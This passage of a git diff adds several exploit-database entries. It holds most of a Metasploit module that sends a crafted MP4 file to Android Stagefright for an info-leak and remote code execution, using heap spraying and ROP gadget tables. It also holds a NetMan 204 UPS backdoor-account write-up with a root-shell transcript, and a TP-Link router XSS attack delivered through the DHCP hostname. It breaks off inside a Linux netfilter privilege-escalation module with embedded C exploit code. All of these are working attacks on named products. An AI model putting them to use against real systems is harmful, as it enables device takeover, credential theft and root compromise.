[ 1 ].pack('N'), tag, [ length ].pack('Q>'), data ].join + end + [ [ length ].pack('N'), tag, data ].join + end + + def get_stsc(num) + stsc_data = [ 0, num ].pack('N*') # version/flags, mNumSampleToChunkOffsets + stsc_data << [ 13+1, 0x5a5a5a5a, 37 ].pack('N*') * num + get_atom('stsc', stsc_data) + end + + def get_ftyp + # Build the MP4 header... + ftyp = 'mp42' + ftyp << [ 0 ].pack('N') + ftyp << 'mp42' + ftyp << 'isom' + get_atom('ftyp', ftyp) + end + + def get_pssh(alloc_size) + pssh_data = '' + pssh_data << [ 0 ].pack('N') + pssh_data << [ 0, 0, 0, 0 ].pack('N*') + pssh_data << [ alloc_size ].pack('N') + alloc_size.times do |off| + pssh_data << [ 0x55aa0000 + off ] .pack('V') + end + get_atom('pssh', pssh_data) + end + + def get_metaitem(tag, type, data) + ret = '' + ret << tag.reverse + ret << type.reverse + case type + when 'in32' + ret << [ 4, data ].pack('V*') + when 'in64' + ret << [ 8, data ].pack('V*') + else + raise "How do you expect me to make a #{type.inspect} ??" + end + ret + end + + def jemalloc_round(sz) + # These are in the 16-byte aligned runs + if (sz > 0x10 && sz <= 0x80) + round = 16 + # 160 starts the 32-byte aligned runs + elsif (sz > 0x80 && sz <= 0x140) + round = 32 + else + raise "Don't know how to round 0x%x" % sz + end + ret = (sz + (round - 1)) / round + ret *= round + return ret + end + + # + # Leak data from mediaserver back to the browser! + # + # Stage 1 - leak a heap pointer near a SampleIterator object + # Stage 2 - read a code pointer from the SampleIterator object + # + def get_mp4_leak(my_target, peer) + # MPEG4 Fileformat Reference: + # http://qtra.apple.com/index.html + # + # Structure: + # [File type Chunk][Other Atom Chunks] + # + # Where [Chunk] == [Atom/Box Length][Atom/Box Type][Atom/Box Data] + # + sampiter_alloc_size = 0x78 + sampiter_alloc_size = my_target['SampleIteratorSize'] if not my_target['SampleIteratorSize'].nil? + sampiter_rounded = jemalloc_round(sampiter_alloc_size) + vector_alloc_size = 0x8c + vector_alloc_size = my_target['VectorSize'] if not my_target['VectorSize'].nil? + groom_count = 0x10 + + is_samsung = (my_target['Rop'] == 'sm-g900v / OE1') + + # Coerce the heap into a favorable shape (fill holes) + shape_vector = get_pssh(vector_alloc_size) + + # Allocate a block of memory of the correct size + placeholder = get_atom('titl', ('t' * 4) + ('titl' * (vector_alloc_size / 4)) + [ 0 ].pack('C')) + + # Make the first tx3g chunk, which is meant to overflow into a MetaData array. + # We account for the overhead of both chunks here and aim for this layout: + # + # placeholder after re-allocation | vector array data + # | + # + # Realistically, tx3g1_padding can be any number that rounds up to the + # correct size class. + tx3g1_overhead = 0x8 + tx3g2_overhead = 0x10 + tx3g_target = jemalloc_round(vector_alloc_size) + tx3g1_padding = tx3g_target - (tx3g1_overhead + tx3g2_overhead) + tx3g_data = 'x' * tx3g1_padding + tx3g_1 = get_atom('tx3g', tx3g_data) + + # NOTE: hvcC added in 3b5a6b9fa6c6825a1d0b441429e2bb365b259827 (5.0.0 and later only) + # avcC was in the initial commit. + near_sampiter = get_atom('hvcC', "C" * sampiter_alloc_size) + + # Craft the data that will overwrite the header and part of the MetaData + # array... + more_data = '' + more_data << [ 9, vector_alloc_size - 0x10, 0, 0 ].pack('V*') + + # Now add the thing(s) we want to control (partially) + # + # We add some BS entries just to kill the real 'heig' and get proper + # ordering... + near_sampiter_addr = peer[:near_sampiter_addr] + if near_sampiter_addr.nil? + # Part 1. Leak the address of a chunk that should be adjacent to a + # SampleIterator object. + if is_samsung + # On Samsung: + # Before: dmcE, dura, frmR, heig, hvcC, inpS, lang, mime, widt + # After: dmcE, abc1, abc2, abc3, heig... + more_data << get_metaitem('dmcE', 'in32', 1) + more_data << get_metaitem('abc1', 'in32', 31335) + more_data << get_metaitem('abc2', 'in32', 31336) + end + + # On Nexus: + # Before: heig, hvcc, inpS, mime, text, widt + # After: abc3, heig... + more_data << get_metaitem('abc3', 'in32', 31337) + + # NOTE: We only use the first 12 bytes so that we don't overwrite the + # pointer that is already there! + heig = get_metaitem('heig', 'in32', 31338) + more_data << heig[0,12] + else + # Part 2. Read from the specified address, as with the original Metaphor + # exploit. + if is_samsung + # On Samsung: + # Before: dmcE, dura, frmR, heig, hvcC, inpS, lang, mime, widt + # After: dmcE, dura, ... + more_data << get_metaitem('dmcE', 'in32', 1) + else + # On Nexus: + # Before: avcc, heig, inpS, mime, text, widt + # After: dura, ... + near_sampiter = get_atom('avcC', "C" * sampiter_alloc_size) + end + + # Try to read the mCurrentChunkSampleSizes vtable ptr within a + # SampleIterator object. This only works because the Vector is empty thus + # passing the restrictions imposed by the duration conversion. + ptr_to_vector_vtable = near_sampiter_addr - (sampiter_rounded * 2) + 0x30 + more_data << get_metaitem('dura', 'in64', ptr_to_vector_vtable) + end + + # The tx3g2 then needs to trigger the integer overflow, but can contain any + # contents. The overflow will terminate at the end of the file. + # + # NOTE: The second tx3g chunk's overhead ends up in the slack space between + # the replaced placeholder and the MetaData Vector contents. + big_num = 0x1ffffffff - tx3g_1.length + 1 + vector_alloc_size + tx3g_2 = get_atom('tx3g', more_data, big_num) + + # Create a minimal, verified 'trak' to satisfy mLastTrack being set + stbl_data = get_stsc(1) + stbl_data << get_atom('stco', [ 0, 0 ].pack('N*')) # version, mNumChunkOffsets + stbl_data << get_atom('stsz', [ 0, 0, 0 ].pack('N*')) # version, mDefaultSampleSize, mNumSampleSizes + stbl_data << get_atom('stts', [ 0, 0 ].pack('N*')) # version, mTimeToSampleCount + stbl = get_atom('stbl', stbl_data) + verified_trak = get_atom('trak', stbl) + + # Start putting it all together into a track. + trak_data = '' + + if is_samsung + # Put some legitimate duration information so we know if we failed + mdhd_data = [ 0 ].pack('N') # version + mdhd_data << "\x00" * 8 # padding + mdhd_data << [ 1 ].pack('N') # timescale + mdhd_data << [ 314 ].pack('N') # duration + mdhd_data << [ 0 ].pack('n') # lang + trak_data << get_atom('mdhd', mdhd_data) + end + + # Add this so that our file is identified as video/mp4 + mp4v_data = '' + mp4v_data << [ 0 ].pack('C') * 24 # padding + mp4v_data << [ 1024 ].pack('n') # width + mp4v_data << [ 768 ].pack('n') # height + mp4v_data << [ 0 ].pack('C') * (78 - mp4v_data.length) # padding + trak_data << get_atom('mp4v', mp4v_data) # satisfy hasVideo = true + + # Here, we cause allocations such that we can replace the placeholder... + if is_samsung + trak_data << placeholder # Somethign we can free + trak_data << shape_vector # Eat the loose block... + trak_data << stbl # Cause the growth of the track->meta Vector + else + trak_data << stbl # Cause the growth of the track->meta Vector + trak_data << placeholder # Somethign we can free + trak_data << shape_vector # Eat the loose block... + end + + # Add the thing whose entry in the MetaData vector we want to overwrite... + trak_data << near_sampiter + + # Get our overflow data into memory + trigger = '' + trigger << tx3g_1 + + # Free the place holder + trigger << get_atom('titl', ('t' * 4) + ('BBBB' * vector_alloc_size) + [ 0 ].pack('C')) + + # Overflow the temporary buffer into the following MetaData array + trigger << tx3g_2 + + # !!! NOTE !!! + # On Samsung devices, the failure that causes ERR to be returned from + # 'tx3g' processing leads to "skipTrack" being set. This means our + # nasty track and it's metadata get deleted and not returned to the + # browser -- effectively killing the infoleak. + # + # However! It also handles "skipTrack" being set specially and does not + # immediately propagate the error to the caller. Instead, it returns OK. + # This allows us to triggering the bug multiple times in one file, or -- + # as we have in this case -- survive after and return successfully. + if is_samsung + # Add this as a nested track! + trak_data << get_atom('trak', trigger) + else + trak_data << trigger + end + trak = get_atom('trak', trak_data) + + # On Samsung devices, we could put more chunks here but they will + # end up smashing the temporary buffer further... + + chunks = [] + chunks << get_ftyp() + chunks << get_atom('moov') + chunks << verified_trak * 0x200 + chunks << shape_vector * groom_count + chunks << trak + + mp4 = chunks.join + mp4 + end + + def get_mp4_rce(my_target, peer) + # MPEG4 Fileformat Reference: + # http://qtra.apple.com/index.html + # + # Structure: + # [File type Chunk][Other Atom Chunks] + # + # Where [Chunk] == [Atom/Box Length][Atom/Box Type][Atom/Box Data] + # + chunks = [] + chunks << get_ftyp() + + # Note, this causes a few allocations + moov_data = '' + mvhd_data = [ 0, 0x41414141 ].pack('N*') + mvhd_data << 'B' * 0x5c + moov_data << get_atom('mvhd', mvhd_data) + + # Add a minimal, verified 'trak' to satisfy mLastTrack being set + verified_trak = '' + stbl_data = get_stsc(0x28) + stbl_data << get_atom('stco', [ 0, 0 ].pack('N*')) # version, mNumChunkOffsets + stbl_data << get_atom('stsz', [ 0, 0, 0 ].pack('N*')) # version, mDefaultSampleSize, mNumSampleSizes + stbl_data << get_atom('stts', [ 0, 0 ].pack('N*')) # version, mTimeToSampleCount + verified_trak << get_atom('trak', get_atom('stbl', stbl_data)) + + # Add it to the file + moov_data << verified_trak + + # The spray_addr field is typically determined empirically (by testing), but + # has proven to be fairly predictable (99%). However, it does vary from + # one device to the next (probably determined by the pre-loaded libraries). + spray_addr = 0xb0c08000 + spray_addr = my_target['SprayAddress'] if not my_target['SprayAddress'].nil? + + # Construct a single page that we will spray + page = build_spray(my_target, peer, spray_addr) + return nil if page.nil? + + # Build a big block full of spray pages and and put it in an avcC chunk + # (but don't add it to the 'moov' yet) + spray = page * (((16 * 1024 * 1024) / page.length) - 20) + avcc = get_atom('avcC', spray) + + # Make the nasty trak + tkhd1 = '' + tkhd1 << [ 0 ].pack('C') # version + tkhd1 << 'D' * 3 # padding + tkhd1 << 'E' * (5*4) # {c,m}time, id, ??, duration + tkhd1 << 'F' * 0x10 # ?? + tkhd1 << [ + 0x10000, # a00 + 0, # a01 + 0, # dx + 0, # a10 + 0x10000, # a11 + 0 # dy + ].pack('N*') + tkhd1 << 'G' * 0x14 # ?? + + # Add the tkhd (track header) to the nasty track + trak1 = '' + trak1 << get_atom('tkhd', tkhd1) + + # Build and add the 'mdia' (Media information) to the nasty track + mdia1 = '' + mdhd1 = [ 0 ].pack('C') # version + mdhd1 << 'D' * 0x17 # padding + mdia1 << get_atom('mdhd', mdhd1) + mdia1 << get_atom('hdlr', 'F' * 0x38) # Media handler + dinf1 = '' + dinf1 << get_atom('dref', 'H' * 0x14) # Data information box + minf1 = '' + minf1 << get_atom('smhd', 'G' * 0x08) + minf1 << get_atom('dinf', dinf1) + stbl1 = get_stsc(2) + minf1 << get_atom('stbl', stbl1) + mdia1 << get_atom('minf', minf1) + trak1 << get_atom('mdia', mdia1) + + # Add something to take up a slot in the 0x20 size range + # NOTE: We have to be able to free this later... + block = 'Q' * 0x1c + trak1 << get_atom('covr', get_atom('data', [ 0, 0 ].pack('N*') + block)) + + # Add a Track (hopefully right after) + trak1 << verified_trak + + # Add the avcC chunk with the heap spray. We add it here so it's sure to be + # allocated when we get control of the program counter... + trak1 << avcc + + # Build the first of the nasty pair of tx3g chunks that trigger the + # vulnerability + alloc_size = 0x20 + overflow_size = 0xc0 + + overflow = [ spray_addr ].pack('V') * (overflow_size / 4) + tx3g_1 = get_atom('tx3g', overflow) + trak1 << tx3g_1 + + # Free the original thing and put the tx3g temporary in it's place... + block = 'R' * 0x40 + trak1 << get_atom('covr', get_atom('data', [ 0, 0 ].pack('N*') + block)) + + # Make the second one, which triggers the integer overflow + big_num = 0x1ffffffff - 8 - overflow.length + 1 + alloc_size + more_data = [ spray_addr ].pack('V') * (overflow_size / 4) + tx3g_2 = get_atom('tx3g', more_data, big_num) + trak1 << tx3g_2 + + # Add the nasty track to the moov data + moov_data << get_atom('trak', trak1) + + # Finalize the moov chunk + moov = get_atom('moov', moov_data) + chunks << moov + + # Combine outer chunks together and voila. + mp4 = chunks.join + mp4 + end + + def on_request_uri(cli, request) + # If the request is for an mp4 file, we need to get the target from the @peers hash + if request.uri =~ /\.mp4\?/i + mp4_fn = request.uri.split('/')[-1] + mp4_fn = mp4_fn.split('?')[0] + mp4_fn[-4,4] = '' + + peer = @peers[mp4_fn] + + my_target = nil + my_target = peer[:target] if peer + if my_target.nil? + send_not_found(cli) + print_error("#{cli.peerhost}:#{cli.peerport} - Requested #{request.uri} - Unknown peer") + return + end + + # Extract the address(s) we just leaked... + sia_addr = request.qstring['sia'].to_i # near_sampiter data address + peer[:near_sampiter_addr] = sia_addr if sia_addr > 0 + sfv_addr = request.qstring['sfv'].to_i # stagefright Vector vtable ptr + peer[:vector_vtable_addr] = sfv_addr if sfv_addr > 0 + # reset after a crash.. + if sia_addr == 0 && sfv_addr == 0 + peer[:near_sampiter_addr] = peer[:vector_vtable_addr] = nil + end + + # Always use this header + out_hdrs = {'Content-Type'=>'video/mp4'} + + if peer[:vector_vtable_addr].nil? + # Generate the nasty MP4 to leak infoz + mode = "infoleak" + mp4 = get_mp4_leak(my_target, peer) + else + mode = "RCE" + mp4 = get_mp4_rce(my_target, peer) + if mp4.nil? + send_not_found(cli) + print_error("#{cli.peerhost}:#{cli.peerport} - Requested #{request.uri} - Failed to generate RCE MP4") + return + end + end + + # Send the nasty MP4 file to trigger the vulnerability + if request.headers['Accept-Encoding'] and request.headers['Accept-Encoding'].include? 'gzip' + mp4 = Rex::Text.gzip(mp4) + out_hdrs.merge!('Content-Encoding' => 'gzip') + gzip = "gzip'd" + else + gzip = "raw" + end + + client = "Browser" + if request.headers['User-Agent'].include? 'stagefright' + client = "SF" + end + + addrs = "heap: 0x%x, code: 0x%x" % [ peer[:near_sampiter_addr].to_i, peer[:vector_vtable_addr].to_i ] + + print_status("Sending #{mode} #{gzip} MPEG4 (#{mp4.length} bytes) to #{cli.peerhost}:#{cli.peerport}... (#{addrs} from #{client})") + + # Send the nastiness! + send_response(cli, mp4, out_hdrs) + return + end + + # Initialize a target. If none suitable, then we don't continue. + my_target = target + if my_target.name =~ /Automatic/ + my_target = get_target(request) + if my_target.nil? + send_not_found(cli) + print_error("#{cli.peerhost}:#{cli.peerport} - Requested #{request.uri} - Unknown user-agent: #{request['User-Agent'].inspect}") + return + end + vprint_status("Target selected: #{my_target.name}") + end + + # Generate an MP4 filename for this peer + mp4_fn = rand_text_alpha(11) + + # Save the target for when they come back asking for this file + # Also initialize the leak address to the first one + @peers[mp4_fn] = { :target => my_target } + + # Send the index page + mp4_uri = "#{get_resource.chomp('/')}/#{mp4_fn}.mp4" + html = %Q^ + +Please wait... + + +
+Please wait while we locate your content... + + +^ + print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...") + send_response(cli, html, {'Content-Type'=>'text/html'}) + end + + # + # Return some firmware-specific values to the caller. + # + # The VectorRVA field is extracted using the following command: + # + # $ arm-eabi-readelf -a libstagefright.so | grep _ZTVN7android6VectorIjEE + # + def get_details(my_target) + details = { + 'lrx' => { + 'VectorRVA' => 0x10ae30, + 'PivotStrategy' => 'lrx', + 'Pivot1' => 0x67f7b, # ldr r4, [r0] ; ldr r1, [r4, #0x10] ; blx r1 + 'Pivot2' => 0xaf9dd, # ldm.w r4, {sp} ; pop {r3, pc} + 'Adjust' => 0x475cd # pop {r3, r4, pc} + }, + 'lmy-1' => { + 'VectorRVA' => 0x10bd58, + 'PivotStrategy' => 'lmy-1', + 'Pivot1' => 0x68783, # ldr r4, [r0] ; ldr r1, [r4, #0x10] ; blx r1 + 'Pivot2' => 0x81959, # ldm.w r4, {r1, ip, sp, pc} + 'Adjust' => 0x479b1 # pop {r3, r4, pc} + }, + 'lmy-2' => { + 'VectorRVA' => 0x10bd58, + 'PivotStrategy' => 'lmy-2', + 'Pivot1' => 0x6f093, # ldr r0, [r0, #0x10] ; ldr r3, [r0] ; ldr r1, [r3, #0x18] ; blx r1 + 'Pivot2' => 0x81921, # ldm.w r0!, {r1, ip, sp, pc} + 'Adjust' => 0x479b1 # pop {r3, r4, pc} + }, + 'shamu / LYZ28E' => { + 'VectorRVA' => 0x116d58, + 'PivotStrategy' => 'lyz', + 'Pivot1' => 0x91e91, # ldr r0, [r0] ; ldr r6, [r0] ; ldr r3, [r6] ; blx r3 + 'Pivot2' => 0x72951, # ldm.w r0, {r0, r2, r3, r4, r6, r7, r8, sl, fp, sp, lr, pc} + 'Adjust' => 0x44f81 # pop {r3, r4, pc} + }, + 'shamu / LYZ28J' => { + 'VectorRVA' => 0x116d58, + 'PivotStrategy' => 'lyz', + 'Pivot1' => 0x91e49, # ldr r0, [r0] ; ldr r6, [r0] ; ldr r3, [r6] ; blx r3 + 'Pivot2' => 0x72951, # ldm.w r0, {r0, r2, r3, r4, r6, r7, r8, sl, fp, sp, lr, pc} + 'Adjust' => 0x44f81 # pop {r3, r4, pc} + }, + 'sm-g900v / OE1' => { + 'VectorRVA' => 0x174048, + 'PivotStrategy' => 'sm-g900v', + 'Pivot1' => 0x89f83, # ldr r4, [r0] ; ldr r5, [r4, #0x20] ; blx r5 + 'Pivot2' => 0xb813f, # ldm.w r4!, {r5, r7, r8, fp, sp, lr} ; cbz r0, #0xb8158 ; ldr r1, [r0] ; ldr r2, [r1, #4] ; blx r2 + 'Adjust' => 0x65421 # pop {r4, r5, pc} + } + } + + details[my_target['Rop']] + end + +end \ No newline at end of file diff --git a/platforms/hardware/remote/40431.txt b/platforms/hardware/remote/40431.txt new file mode 100755 index 000000000..bcbeb84a1 --- /dev/null +++ b/platforms/hardware/remote/40431.txt @@ -0,0 +1,78 @@ +NetMan 204 - Backdoor Account + +Author: Saeed reza Zamanian [penetrationtest @ Linkedin] + +Product: NetMan 204 +Vendor: http://www.riello-ups.com +Product URL: http://www.riello-ups.com/products/4-software-connectivity/85-netman-204 +Quick Reference Installation Manual : http://www.riello-ups.com/uploads/file/325/1325/0MNACCSA4ENQB__MAN_ACC_NETMAN_204_QST_EN_.pdf + +Date: 23 Sep 2016 + +About Product: +---------------------- +The NetMan 204 network agent allows UPS directly connected over LAN 10/100 Mb connections to be managed using the main network communication protocols (TCP /IP , HTTP HTTPS, SSH, SNMPv1, SNMPv2 and SNMPv3). +It is the ideal solution for the integration of UPS over Ethernet networks with Modbus/TCP and BACnet/IP protocols. It was developed to integrate UPS into medium-sized and large networks, +to provide a high level of reliability in communication between the UPS and associated management systems. + +Vulnerability Report: +---------------------- +The UPS Module has 3 default accounts, (admin,fwupgrade,user) , fwupgrade has a shell access to the device BUT if you try to get access to the shell a shell script closes your conection. +to stop the shell script and avoid to terminate your connection you should , set your SSH client to execute "/bin/bash" after you logon the SSH. as a result your shell type will be changed to "/bin/bash" +as you see below there is an account called "eurek" and ofcourse it's password also is "eurek". +Since that "eurek" is a sudoer user you will get full access to the device. + +Enjoy It! + + +login as: eurek +eurek@172.19.16.33's password: +Could not chdir to home directory /home/eurek: No such file or directory +eurek@UPS:/$ id +uid=1000(eurek) gid=1000(eurek) groups=1000(eurek),27(sudo) +eurek@UPS:/$ sudo bash +[sudo] password for eurek: +root@UPS:/# id +uid=0(root) gid=0(root) groups=0(root) +root@UPS:/# + + + +login as: fwupgrade +fwupgrade@172.19.16.33's password: +fwupgrade@UPS:/home/fwupgrade$ cat /etc/passwd +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/bin/sh +bin:x:2:2:bin:/bin:/bin/sh +sys:x:3:3:sys:/dev:/bin/sh +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/bin/sh +man:x:6:12:man:/var/cache/man:/bin/sh +lp:x:7:7:lp:/var/spool/lpd:/bin/sh +mail:x:8:8:mail:/var/mail:/bin/sh +news:x:9:9:news:/var/spool/news:/bin/sh +uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh +proxy:x:13:13:proxy:/bin:/bin/sh +www-data:x:33:33:www-data:/var/www:/bin/sh +backup:x:34:34:backup:/var/backups:/bin/sh +list:x:38:38:Mailing List Manager:/var/list:/bin/sh +irc:x:39:39:ircd:/var/run/ircd:/bin/sh +gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh +nobody:x:65534:65534:nobody:/nonexistent:/bin/sh +libuuid:x:100:101::/var/lib/libuuid:/bin/sh +sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin +messagebus:x:102:104::/var/run/dbus:/bin/false +eurek:x:1000:1000:eurek,,,:/home/eurek:/bin/bash +postfix:x:103:106::/var/spool/postfix:/bin/false +statd:x:104:65534::/var/lib/nfs:/bin/false +pulse:x:105:110:PulseAudio daemon,,,:/var/run/pulse:/bin/false +rtkit:x:106:112:RealtimeKit,,,:/proc:/bin/false +admin:x:1001:1001:,,,:/home/./admin:/bin/bash +fwupgrade:x:1002:1002:,,,:/home/./fwupgrade:/bin/bash +user:x:1003:1003:,,,:/home/user:/bin/bash +ftp:x:107:113:ftp daemon,,,:/srv/ftp:/bin/false +fwupgrade@UPS:/home/fwupgrade$ + + + +# EOF \ No newline at end of file diff --git a/platforms/hardware/webapps/40432.txt b/platforms/hardware/webapps/40432.txt new file mode 100755 index 000000000..fd8dff49f --- /dev/null +++ b/platforms/hardware/webapps/40432.txt @@ -0,0 +1,44 @@ +# Exploit Title: TP-Link Archer CR-700 XSS vulnerability +# Google Dork: N/A +# Date: 09/07/2016 +# Exploit Author: Ayushman Dutta +# Vendor Homepage: http://www.tp-link.us/ +# Software Link: N/A +# Version: 1.0.6 (REQUIRED) +# Tested on: Linux +# CVE : N/A +#Exploit Information: +https://github.com/ayushman4/TP-Link-Archer-CR-700-XSS-Exploit/blob/master/README.md + +TP-Link-Archer-CR-700-XSS-Exploit + +Exploiting TP-Link Archer CR-700 Router. (Responsibly Disclosed to TP-Link) + +Step 1-> On you linux machine (Kali or Ubuntu) type the following command + +gedit /etc/dhcp/dhclient.conf + +Comment out the line below +send host-name = gethostname(); + +Copy it to the line below it and change the gethostname() function to an XSS script like below. + +send host-name = ""; + +Step 2:Restart your linux system so that the changes takes into effect. + +Step 3: Send a DHCP request to the router to receive an IP address with the command below.(Try this on any open network routers which is using TP-Link Archer CR-700) + +dhclient -v -i wlan0 + +On running the command above, it send a DHCP request to the router. On a DHCP request, the host name is sent to which we have forcibly set it to an XSS script + +Step 4: Login to the administrator console. + +On logging in the Script executes. + +One more issue that I saw in the router that was that there was no CSRF token. The cookie set by the router contains a base64 encoded username & password whcih can be stolen using an XSS script. + +Note:All The above information has been disclosed to TP-Link, who have reporduced the problem and passed it to their R&D team to fix the issue. + +A URL to the product https://www.amazon.com/Wireless-Certified-Cablevision-Archer-CR700/dp/B012I96J3W diff --git a/platforms/lin_x86/local/40435.rb b/platforms/lin_x86/local/40435.rb new file mode 100755 index 000000000..888ab721f --- /dev/null +++ b/platforms/lin_x86/local/40435.rb @@ -0,0 +1,431 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require "msf/core" + +class MetasploitModule < Msf::Exploit::Local + Rank = GoodRanking + + include Msf::Post::File + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Linux Kernel 4.6.3 Netfilter Privilege Escalation', + 'Description' => %q{ + This module attempts to exploit a netfilter bug on Linux Kernels befoe 4.6.3, and currently + only works against Ubuntu 16.04 (not 16.04.1) with kernel + 4.4.0-21-generic. + Several conditions have to be met for successful exploitation: + Ubuntu: + 1. ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do such) + 2. libc6-dev-i386 (ubuntu), glibc-devel.i686 & libgcc.i686 (fedora) needs to be installed to compile + Kernel 4.4.0-31-generic and newer are not vulnerable. + + We write the ascii files and compile on target instead of locally since metasm bombs for not + having cdefs.h (even if locally installed) + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'h00die ', # Module + 'vnik' # Discovery + ], + 'DisclosureDate' => 'Jun 03 2016', + 'Platform' => [ 'linux'], + 'Arch' => [ ARCH_X86 ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => + [ + [ 'Ubuntu', { } ] + #[ 'Fedora', { } ] + ], + 'DefaultTarget' => 0, + 'References' => + [ + [ 'EDB', '40049'], + [ 'CVE', '2016-4997'], + [ 'URL', 'http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ce683e5f9d045e5d67d1312a42b359cb2ab2a13c'] + ] + )) + register_options( + [ + OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]), + OptInt.new('MAXWAIT', [ true, 'Max seconds to wait for decrementation in seconds', 180 ]), + OptBool.new('REEXPLOIT', [ true, 'desc already ran, no need to re-run, skip to running pwn',false]), + OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']]) + ], self.class) + end + + def check + def iptables_loaded?() + # user@ubuntu:~$ cat /proc/modules | grep ip_tables + # ip_tables 28672 1 iptable_filter, Live 0x0000000000000000 + # x_tables 36864 2 iptable_filter,ip_tables, Live 0x0000000000000000 + vprint_status('Checking if ip_tables is loaded in kernel') + if target.name == "Ubuntu" + iptables = cmd_exec('cat /proc/modules | grep ip_tables') + if iptables.include?('ip_tables') + vprint_good('ip_tables.ko is loaded') + else + print_error('ip_tables.ko is not loaded. root needs to run iptables -L or similar command') + end + return iptables.include?('ip_tables') + elsif target.name == "Fedora" + iptables = cmd_exec('cat /proc/modules | grep iptable_raw') + if iptables.include?('iptable_raw') + vprint_good('iptable_raw is loaded') + else + print_error('iptable_raw is not loaded. root needs to run iptables -L or similar command') + end + return iptables.include?('iptable_raw') + else + return false + end + end + + def shemsham_installed?() + # we want this to be false. + vprint_status('Checking if shem or sham are installed') + shemsham = cmd_exec('cat /proc/cpuinfo') + if shemsham.include?('shem') + print_error('shem installed, system not vulnerable.') + elsif shemsham.include?('sham') + print_error('sham installed, system not vulnerable.') + else + vprint_good('shem and sham not present.') + end + return (shemsham.include?('shem') or shemsham.include?('sham')) + end + + if iptables_loaded?() and not shemsham_installed?() + return CheckCode::Appears + else + return CheckCode::Safe + end + end + + def exploit + # first thing we need to do is determine our method of exploitation: compiling realtime, or droping a pre-compiled version. + def has_prereqs?() + vprint_status('Checking if 32bit C libraries, gcc-multilib, and gcc are installed') + if target.name == "Ubuntu" + lib = cmd_exec('dpkg --get-selections | grep libc6-dev-i386') + if lib.include?('install') + vprint_good('libc6-dev-i386 is installed') + else + print_error('libc6-dev-i386 is not installed. Compiling will fail.') + end + multilib = cmd_exec('dpkg --get-selections | grep ^gcc-multilib') + if multilib.include?('install') + vprint_good('gcc-multilib is installed') + else + print_error('gcc-multilib is not installed. Compiling will fail.') + end + gcc = cmd_exec('which gcc') + if gcc.include?('gcc') + vprint_good('gcc is installed') + else + print_error('gcc is not installed. Compiling will fail.') + end + return gcc.include?('gcc') && lib.include?('install') && multilib.include?('install') + elsif target.name == "Fedora" + lib = cmd_exec('dnf list installed | grep -E \'(glibc-devel.i686|libgcc.i686)\'') + if lib.include?('glibc') + vprint_good('glibc-devel.i686 is installed') + else + print_error('glibc-devel.i686 is not installed. Compiling will fail.') + end + if lib.include?('libgcc') + vprint_good('libgcc.i686 is installed') + else + print_error('libgcc.i686 is not installed. Compiling will fail.') + end + multilib = false #not implemented + gcc = false #not implemented + return (lib.include?('glibc') && lib.include?('libgcc')) && gcc && multilib + else + return false + end + end + + compile = false + if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True' + if has_prereqs?() + compile = true + vprint_status('Live compiling exploit on system') + else + vprint_status('Dropping pre-compiled exploit on system') + end + end + if check != CheckCode::Appears + fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!') + end + + desc_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8) + env_ready_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8) + pwn_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8) + payload_file = rand_text_alpha(8) + payload_path = "#{datastore["WritableDir"]}/#{payload_file}" + + # direct copy of code from exploit-db, except removed the check for shem/sham and ip_tables.ko since we can do that in the check area here + # removed #include per busterb comment in PR 7326 + decr = %q{ + #define _GNU_SOURCE + #include + #include + #include + #include + #include + #include + #include + #include + #include + #include + #include + #include + #include + #include + #include + #include + + #define MALLOC_SIZE 66*1024 + + int decr(void *p) { + int sock, optlen; + int ret; + void *data; + struct ipt_replace *repl; + struct ipt_entry *entry; + struct xt_entry_match *ematch; + struct xt_standard_target *target; + unsigned i; + + sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW); + + if (sock == -1) { + perror("socket"); + return -1; + } + + data = malloc(MALLOC_SIZE); + + if (data == NULL) { + perror("malloc"); + return -1; + } + + memset(data, 0, MALLOC_SIZE); + + repl = (struct ipt_replace *) data; + repl->num_entries = 1; + repl->num_counters = 1; + repl->size = sizeof(*repl) + sizeof(*target) + 0xffff; + repl->valid_hooks = 0; + + entry = (struct ipt_entry *) (data + sizeof(struct ipt_replace)); + entry->target_offset = 74; // overwrite target_offset + entry->next_offset = sizeof(*entry) + sizeof(*ematch) + sizeof(*target); + + ematch = (struct xt_entry_match *) (data + sizeof(struct ipt_replace) + sizeof(*entry)); + + strcpy(ematch->u.user.name, "icmp"); + void *kmatch = (void*)mmap((void *)0x10000, 0x1000, 7, 0x32, 0, 0); + uint64_t *me = (uint64_t *)(kmatch + 0x58); + *me = 0xffffffff821de10d; // magic number! + + uint32_t *match = (uint32_t *)((char *)&ematch->u.kernel.match + 4); + *match = (uint32_t)kmatch; + + ematch->u.match_size = (short)0xffff; + + target = (struct xt_standard_target *)(data + sizeof(struct ipt_replace) + 0xffff + 0x8); + uint32_t *t = (uint32_t *)target; + *t = (uint32_t)kmatch; + + printf("[!] Decrementing the refcount. This may take a while...\n"); + printf("[!] Wait for the \"Done\" message (even if you'll get the prompt back).\n"); + + for (i = 0; i < 0xffffff/2+1; i++) { + ret = setsockopt(sock, SOL_IP, IPT_SO_SET_REPLACE, (void *) data, 66*1024); + } + + close(sock); + free(data); + printf("[+] Done! Now run ./pwn\n"); + + return 0; + } + + int main(void) { + void *stack; + int ret; + + printf("netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik\n"); + 